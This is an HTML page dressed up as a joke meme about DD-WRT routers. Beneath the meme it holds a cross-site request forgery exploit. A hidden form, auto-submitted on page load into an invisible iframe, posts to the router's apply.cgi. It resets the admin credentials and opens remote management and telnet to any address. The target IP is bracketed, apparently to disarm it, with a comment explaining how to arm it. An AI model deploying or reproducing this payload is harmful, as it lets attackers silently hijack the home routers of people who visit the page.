<!DOCTYPE HTML>
<html>
	<head>
		<title>DD-WRT is kill (rip)</title>
		<style>
			#hidden {
				height: 1px;
				width: 2px;
				opacity: 0;
			}
			
			body {
				font-family: Georgia,Palatino,serif;
				background-color: #FFDDDD;
			}

			pre {
			    font-family: "Comic Sans MS",Palatino,ariel;
			}

			h1.title {
			    color: purple;
				font-size: 3em;
			}

			img { border: 0; }

			.hidden { display: none; }

			input[type=text],textarea { 
 			   border: 2px solid purple;
 			   background-color: #FFEEEE;
			}

			input[type=text]:focus,textarea:focus {
			    border: 2px solid pink;
			}

			select {
			    border: 2px solid purple;
			    background-color: #FFEEEE;
			}

			select:focus {
			    border: 2px solid pink;
			}

			input[type=button],input[type=file],input[type=submit] {
				dorder: 2px solid purple;
				background: #FFEEEE;
			}

			input[type=button]:hover,input[type=file]:hover,input[type=submit]:hover {
				background: #FFAAAA;
			}
			
			.spoiler {
				background-color: #000;
			}
			
			.spoiler:hover {
				background-color: #FFDDDD;
			}
		</style>
	</head>
	
	<body>
		<h1 class="title">All your DD-WRT are belong to Princess Pi!</h1>
		<h2>You have no chance to survive the <span class="spoiler">friendship</span></h2>
		<h3>Make your time</h3>
		<p>
			<img src="http://t.facdn.net/14495242@400-1410316226.jpg">
		</p>
		<!-- PROTECTING CODE -->
		<!-- REMOVE [ AND ] FROM IP ADDRESS TO ARM -->
		<form id="form" method="post" target="hidden" action="http://[192.168.1.1]/apply.cgi">
			<input type="hidden" name="PasswdModify" value="1">
			<input type="hidden" name="_http_enable" value="1">
			<input type="hidden" name="action" value="ApplyTake">
			<input type="hidden" name="boot_wait" value="on">
			<input type="hidden" name="change_action" value="">
			<input type="hidden" name="clean_jffs2" value="0">
			<input type="hidden" name="commit" value="1">
			<input type="hidden" name="cron_enable" value="1">
			<input type="hidden" name="cron_jobs" value="">
			<input type="hidden" name="enable_jffs2" value="0">
			<input type="hidden" name="http_enable" value="1">
			<input type="hidden" name="http_passwd" value="admin">
			<input type="hidden" name="http_passwdConfirm" value="password">
			<input type="hidden" name="http_username" value="password">
			<input type="hidden" name="http_wanport" value="80">
			<input type="hidden" name="https_enable" value="0">
			<input type="hidden" name="info_passwd" value="0">
			<input type="hidden" name="ip_conntrack_max" value="32768">
			<input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600">
			<input type="hidden" name="ip_conntrack_udp_timeouts" value="120">
			<input type="hidden" name="ipv6_enable0" value="0">
			<input type="hidden" name="language" value="english">
			<input type="hidden" name="maskmac" value="1">
			<input type="hidden" name="nas_enable" value="1">
			<input type="hidden" name="radvd_conf" value="">
			<input type="hidden" name="radvd_enable" value="0">
			<input type="hidden" name="refresh_time" value="3">
			<input type="hidden" name="remote_ip" value="4">
			<input type="hidden" name="remote_ip_0" value="0">
			<input type="hidden" name="remote_ip_1" value="0">
			<input type="hidden" name="remote_ip_2" value="0">
			<input type="hidden" name="remote_ip_3" value="0">
			<input type="hidden" name="remote_ip_4" value="0">
			<input type="hidden" name="remote_ip_any" value="1">
			<input type="hidden" name="remote_management" value="1">
			<input type="hidden" name="remote_mgt_https" value="0">
			<input type="hidden" name="remote_mgt_telnet" value="1">
			<input type="hidden" name="resetbutton_enable" value="1">
			<input type="hidden" name="router_style" value="elegant">
			<input type="hidden" name="samba_mount" value="0">
			<input type="hidden" name="samba_password" value="password">
			<input type="hidden" name="samba_script" value="yourscript">
			<input type="hidden" name="samba_share" value="//yourserverip/yourshare">
			<input type="hidden" name="samba_user" value="username/computer">
			<input type="hidden" name="status_auth" value="1">
			<input type="hidden" name="submit_button" value="Management">
			<input type="hidden" name="submit_type" value="">
			<input type="hidden" name="tcp_congestion_control" value="vegas">
			<input type="hidden" name="telnet_wanpor" value="23">
			<input type="hidden" name="zebra_enable" value="1">
		</form>

		<iframe src="" id="hidden" name="hidden"></iframe>

		<script>
			// allahu ackbar
			document.getElementById("form").submit();
		</script>
	</body>
</html>